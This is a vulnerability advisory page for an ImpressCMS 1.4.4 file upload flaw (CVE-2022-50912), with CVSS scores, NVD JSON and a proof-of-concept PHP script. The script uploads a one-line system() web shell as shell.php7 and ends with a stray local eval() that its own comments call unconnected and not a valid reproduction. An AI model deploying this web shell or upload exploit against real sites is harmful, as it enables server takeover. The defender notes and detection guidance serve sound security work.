Security Vulnerability Report
CVE-2022-50912 CVSS 9.8 CRITICAL

CVE-2022-50912

Published: 2026-01-13 23:15:54
Last Modified: 2026-02-03 19:26:43

Description

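ImpressCMS 1.4.4 contains a file upload vulnerability with weak extension sanitization that allows attackers to upload potentially malicious files. Attackers can bypass file upload restrictions by using alternative file extensions (.php2, .php6, .php7, .phps, .pht) to execute arbitrary PHP code on the server. Whether such a file actually executes depends on the web server mapping that extension to the PHP handler, so upload directories should not be served through the PHP interpreter at all.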

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:impresscms:impresscms:1.4.4:*:*:*:*:*:*:* - VULNERABLE
ImpressCMS < 1.4.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
php
<?php
// CVE-2022-50912 PoC - ImpressCMS File Upload RCE
// Target: ImpressCMS <= 1.4.4
// Exploit: Upload malicious PHP file with .php7 extension
//
// What this listing does, read top to bottom: it builds a one-part
// multipart/form-data body by hand, POSTs it with cURL to user.php?op=update
// on $target, stores the reply in $response, and finally calls eval() in the
// local PHP process.
//
// NOTE(review): treat this as an illustration of the weakness class, not as a
// validated reproduction. $upload_path is assigned but never read, $response
// is never inspected, and the closing eval() has no connection to the HTTP
// request above it. A negative result from running it says nothing about
// whether an installation is patched.
//
// Defender notes (CWE-434, unrestricted upload of a dangerous file type):
// - Validate uploads against an allowlist of expected extensions and decoded
//   content, not a blocklist that only knows ".php".
// - Store uploads outside the web root, or in a directory where the server
//   never invokes the PHP handler, and rename them server-side.
// - Detection: upload requests whose filename ends in .php2, .php6, .php7,
//   .phps or .pht, and files with those extensions appearing under upload
//   directories.

$target = 'http://target-website.com'; // placeholder-looking host; not a real system named by the page
$upload_path = '/modules/profile/avatar.php7'; // Known upload path (NOTE(review): unused below)

// Create malicious PHP file content
// The file body is a one-line script that passes a query-string parameter to
// system(); this is the behaviour an upload filter has to keep out.
$payload = '<?php system($_GET["cmd"]); ?>';

// Prepare multipart form data
// Random boundary, then a single part named "avatar_file" whose filename
// carries the .php7 extension and a generic octet-stream content type.
$boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(8));
$body = '--' . $boundary . "\r\n";
$body .= 'Content-Disposition: form-data; name="avatar_file"; filename="shell.php7"' . "\r\n";
$body .= 'Content-Type: application/octet-stream' . "\r\n\r\n";
$body .= $payload . "\r\n";
$body .= '--' . $boundary . '--' . "\r\n";

// Send the body as a raw POST; the only header set is the multipart
// Content-Type that announces the boundary.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target . '/user.php?op=update');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $body);
curl_setopt($ch, CURLOPT_HTTPHEADER, [ 'Content-Type: multipart/form-data; boundary=' . $boundary ]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // return the reply as a string instead of printing it
$response = curl_exec($ch); // NOTE(review): result (or false on failure) is never checked
curl_close($ch);

// Execute command via uploaded shell
// NOTE(review): this eval() runs system() in the process executing this
// script, using that process's own $_GET. If this file were ever placed on a
// web server it would itself be a command-execution endpoint, so it should
// not be hosted or run outside an isolated lab.
eval('system($_GET["cmd"]);');
// Usage: ?cmd=whoami
?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50912", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:54.350", "lastModified": "2026-02-03T19:26:43.090", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ImpressCMS 1.4.4 contains a file upload vulnerability with weak extension sanitization that allows attackers to upload potentially malicious files. Attackers can bypass file upload restrictions by using alternative file extensions .php2.php6.php7.phps.pht to execute arbitrary PHP code on the server."}, {"lang": "es", "value": "ImpressCMS 1.4.4 contiene una vulnerabilidad de carga de archivos con una sanitización débil de la extensión que permite a los atacantes cargar archivos potencialmente maliciosos. Los atacantes pueden eludir las restricciones de carga de archivos utilizando extensiones de archivo alternativas .php2.php6.php7.phps.pht para ejecutar código PHP arbitrario en el servidor."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": 
"NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:impresscms:impresscms:1.4.4:*:*:*:*:*:*:*", "matchCriteriaId": "613DF01A-E71B-46E2-AF83-FCB4A46EB17E"}]}]}], "references": [{"url": "https://github.com/ImpressCMS/impresscms", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/50890", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.impresscms.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/impresscms-unrestricted-file-upload", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}